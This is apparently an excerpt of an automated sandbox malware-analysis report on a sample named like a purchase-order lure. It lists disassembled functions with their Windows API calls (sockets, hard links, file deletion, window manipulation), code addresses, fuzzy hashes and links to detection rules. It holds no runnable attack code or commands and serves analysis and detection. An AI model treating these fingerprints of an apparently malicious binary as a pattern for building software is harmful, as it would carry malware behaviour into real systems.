Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 3e9ce65d11b316350caf6cb0db2ee4373dc883206541589756c66e9508b68ec6
Instruction ID: 4e1e522645e86f73b8885f2d86dba7d443b77ce6b8f7ad4508257b27d10f8221
Opcode Fuzzy Hash: 3e9ce65d11b316350caf6cb0db2ee4373dc883206541589756c66e9508b68ec6
Instruction Fuzzy Hash: 3DD18D746003018FD724DF25D484A26B7E1EF49704F64887EE9899B3A1D739EC92CB9A

Function 0041456C Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

__flush.LIBCMT ref: 00414630
__fileno.LIBCMT ref: 00414650
__locking.LIBCMT ref: 00414657
__flsbuf.LIBCMT ref: 00414682

Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23

Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
String ID:
API String ID: 3240763771-0
Opcode ID: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
Instruction ID: ec1a4dff6c5341ad57a53ba98b0f539b864df2cc4a0ba96fecd891c5d8a4160d
Opcode Fuzzy Hash: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
Instruction Fuzzy Hash: 4841A571A00605ABDB249FA5C9445DFB7B6EFC1328F28852FE41997280D77CDEC18B48

Function 004781AE Relevance: 6.1, APIs: 4, Instructions: 135COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
VariantCopy.OLEAUT32(?,?), ref: 00478259
VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
VariantCopy.OLEAUT32(-00000078,?), ref: 00478287

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: CopyVariant$ErrorLast
String ID:
API String ID: 2286883814-0
Opcode ID: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
Instruction ID: 2d87100fc18953c9afe9b7e879878e48daa4ef19e0256d9a4550ae3fa38499cf
Opcode Fuzzy Hash: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
Instruction Fuzzy Hash: 5F517C751543409FC310DF69C880A9BBBE4FF88314F448A6EF9499B352DB39E909CB99

Function 0047404B Relevance: 6.1, APIs: 4, Instructions: 133networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00474068
WSAGetLastError.WSOCK32(00000000,00000002,00000002,00000011), ref: 00474076
#21.WSOCK32 ref: 004740E0
WSAGetLastError.WSOCK32(00000000), ref: 004740EB

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: 34147ac461a0e284a181aa69957adffe558344c6371ca04fba36d93f3b76d486
Instruction ID: ff1742a21ceaee7448286ece46cbaad1fa76dded649dcd1b12ff87c083dae87e
Opcode Fuzzy Hash: 34147ac461a0e284a181aa69957adffe558344c6371ca04fba36d93f3b76d486
Instruction Fuzzy Hash: 7641D9717403006AE720BF6ADC47F5672C89B54B18F14496EF648BF2C3D6FAA881869C

Function 00441CB4 Relevance: 6.1, APIs: 4, Instructions: 112windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(00000000,?), ref: 00441CDE
GetWindowRect.USER32(?,?), ref: 00441D5A
PtInRect.USER32(?,?,?), ref: 00441D6F
MessageBeep.USER32(00000000), ref: 00441DF2

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
Instruction ID: 11ad13a84751b34e4f8a983c71a6a29643224e7bbeba0240db3aabd8edeb2108
Opcode Fuzzy Hash: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
Instruction Fuzzy Hash: E64192B5A042418FE710DF18D884AABB7E5FFC9311F18866FE8518B360D734AC85CBA5

Function 0042384A Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042387E
__isleadbyte_l.LIBCMT ref: 004238B2
MultiByteToWideChar.KERNEL32(?,00000009,00000002,?,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 004238E3
MultiByteToWideChar.KERNEL32(?,00000009,00000002,00000001,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 00423951

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
Instruction ID: 550681b3841f0f34ee613cb5364b25607849a03987ccfca5eaaec14299199b49
Opcode Fuzzy Hash: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
Instruction Fuzzy Hash: A931C270B00265EFDB20EF64D8849AA7BF5EF01312B9445AAF0A09F291D338CE81CB55

Function 0045D070 Relevance: 6.1, APIs: 4, Instructions: 100fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D10A
GetLastError.KERNEL32(?,00000000), ref: 0045D12B
DeleteFileW.KERNEL32(00000000,?), ref: 0045D14C
CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0045D16A

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
Instruction ID: 240381fd0e223f31e6bb83dc4f900fe278965bce5f9bbaa9f824fb1079ab41c9
Opcode Fuzzy Hash: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
Instruction Fuzzy Hash: 393180B5900301ABCB10AF71C985A1BF7E8AF84755F10891EF85497392C739FC45CB68

Function 0045058D Relevance: 6.1, APIs: 4, Instructions: 98COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 004505BF
DefDlgProcW.USER32(?,00000138,?,?,004A83D8,?,004A83D8,?), ref: 00450610
DefDlgProcW.USER32(?,00000133,?,?,004A83D8,?,004A83D8,?), ref: 0045065A
DefDlgProcW.USER32(?,00000134,?,?,004A83D8,?,004A83D8,?), ref: 00450688

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Proc$Parent
String ID:
API String ID: 2351499541-0
Opcode ID: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
Instruction ID: e3e31f905615dd8bfbe674c7a91f48f64006a8638b4dc9b760805e547d05c650
Opcode Fuzzy Hash: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
Instruction Fuzzy Hash: 8C3128362411006BC2209B299C58DBB7B58EBC7336F14465BFA54832D3CB769826C768

Function 004613E0 Relevance: 6.1, APIs: 4, Instructions: 90windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00438C85: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00438C95

Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2

SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 00461420
SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 0046144F
__itow.LIBCMT ref: 00461461
__itow.LIBCMT ref: 004614AB

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: MessageSend$__itow$_wcslen
String ID:
API String ID: 2875217250-0
Opcode ID: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
Instruction ID: b65c482f8247f617b799fd724a7506577ebf884cdb52d0d4602b18db992df379
Opcode Fuzzy Hash: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
Instruction Fuzzy Hash: 3A213D7670031067D210BA169C86FAFB794EB94714F08443FFF44AB241EE69E94687EB

Function 004727F8 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00472806

Part of subcall function 00443EEF: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 00443F11
Part of subcall function 00443EEF: GetCurrentThreadId.KERNEL32 ref: 00443F18
Part of subcall function 00443EEF: AttachThreadInput.USER32(00000000), ref: 00443F1F

GetCaretPos.USER32(?), ref: 0047281A
ClientToScreen.USER32(00000000,?), ref: 00472856
GetForegroundWindow.USER32 ref: 0047285C

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
Instruction ID: 38f02bd9b1f6bed34cfa7ce2d7f69328ba3456287a0ba45db7850a86b8391dd2
Opcode Fuzzy Hash: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
Instruction Fuzzy Hash: FF2195716403056FE310EF65CC42F5BB7E8AF84708F144D2EF544AB282D6FAB9858795

Function 0047721A Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51

GetWindowLongW.USER32(?,000000EC), ref: 0047728E
SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772A9
SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772C0
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001,?,?), ref: 004772D0

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
Instruction ID: faea1ea985e506ac999786301d765d91882fdca708237d94abe4bce3661c65f1
Opcode Fuzzy Hash: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
Instruction Fuzzy Hash: 5F11B431205510ABD310FB29DD45F9BB798FF91720F10862EF455E72E2C7A8AC45C7A8

Function 00448C8B Relevance: 6.1, APIs: 4, Instructions: 73windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32 ref: 00448CB8
GetWindowLongW.USER32(?,000000EC), ref: 00448CE0
SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448D19
SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D62

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
Instruction ID: 9d6bf2a2f0cb0d5184a29e15ea511504db1ac53b4253ca88fa0f688086887250
Opcode Fuzzy Hash: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
Instruction Fuzzy Hash: B12174715053019BF3208F18D98879FB7E4FBD5325F140B2EF594962D0DBB58449C796

Function 004588B0 Relevance: 6.1, APIs: 4, Instructions: 67networkCOMMON

Download Yara Rule

APIs

select.WSOCK32 ref: 0045890A
__WSAFDIsSet.WSOCK32(00000000,00000000), ref: 00458919
accept.WSOCK32(00000000,00000000,00000000,00000000,00000000), ref: 00458927
WSAGetLastError.WSOCK32(00000000), ref: 00458952

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: ErrorLastacceptselect
String ID:
API String ID: 385091864-0
Opcode ID: 4f99be09ea3748399bcd45f1fb284b1e509608db9923cba0f0141099163bafeb
Instruction ID: 93f38c3b8a65fd8a68e5265ae944391143789c71a4918893f245a539b4228a7d
Opcode Fuzzy Hash: 4f99be09ea3748399bcd45f1fb284b1e509608db9923cba0f0141099163bafeb
Instruction Fuzzy Hash: 1F2166712043019BD314EF29C842BABB7E5AFC4714F144A2EF994DB2C1DBB4A985CB99

Function 00438D4E Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00438D6F
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D82
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D9A
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438DB4

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
Instruction ID: 707762f1bc06eebb59e9357f9c77b20c0e090dcf7cedc03b298b4f863176c0ea
Opcode Fuzzy Hash: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
Instruction Fuzzy Hash: 77113AB6204305AFD210EF58DC84F6BF7E8EBE8750F20491EF580D7290D6B1A8468BA1

Function 0043362D Relevance: 6.1, APIs: 4, Instructions: 54windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,FFFFFFFF,?,?,?,?,?,?,00400000,00000000), ref: 0043367E
GetStockObject.GDI32(00000011), ref: 00433695
SendMessageW.USER32(00000000,00000030,00000000), ref: 0043369F
ShowWindow.USER32(00000000,00000000), ref: 004336BA

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Window$CreateMessageObjectSendShowStock
String ID:
API String ID: 1358664141-0
Opcode ID: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
Instruction ID: 5bb77caae3378c1c36de35f78993aeb7f53e4fc0e9047450929301c31466c70f
Opcode Fuzzy Hash: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
Instruction Fuzzy Hash: 60114F72204A00BFD254DF55CC49F5BB3F9AFCCB01F20950DB254922A0D7B4E9418BA9

Function 0044419B Relevance: 6.1, APIs: 4, Instructions: 53synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 004441B8
MessageBoxW.USER32(?,?,?,?), ref: 004441F6
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0044420C
CloseHandle.KERNEL32(00000000), ref: 00444213

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
Instruction ID: a177bb78e812b0c83f085b16f259857c8a511f23e32e5024349264f8b0df3d09
Opcode Fuzzy Hash: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
Instruction Fuzzy Hash: C401E5364183105BD300DB28ED08A9BBBD8BFD9721F18067EF89893351E6B48948C7B6

Function 0043401C Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00434037
ScreenToClient.USER32(?,?), ref: 0043405B
ScreenToClient.USER32(?,?), ref: 00434085
InvalidateRect.USER32(?,?,?), ref: 004340A4

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
Instruction ID: 02545dd0d615a745195cb6f618e51c1f9c2552a202a2369b8695847d2ce6fb2f
Opcode Fuzzy Hash: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
Instruction Fuzzy Hash: 24117EB9608302AFC304DF18D98095BBBE9FFD8650F10891EF88993350D770E9498BA2

Function 00436A1D Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 00436A45

Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2

__wsplitpath.LIBCMT ref: 00436A6C
__wcsicoll.LIBCMT ref: 00436A93
__wcsicoll.LIBCMT ref: 00436AB0

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
String ID:
API String ID: 1187119602-0
Opcode ID: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
Instruction ID: cc447ddabc085245cf6c6bda96777749177fc915bba42f20b5b260b799017f3a
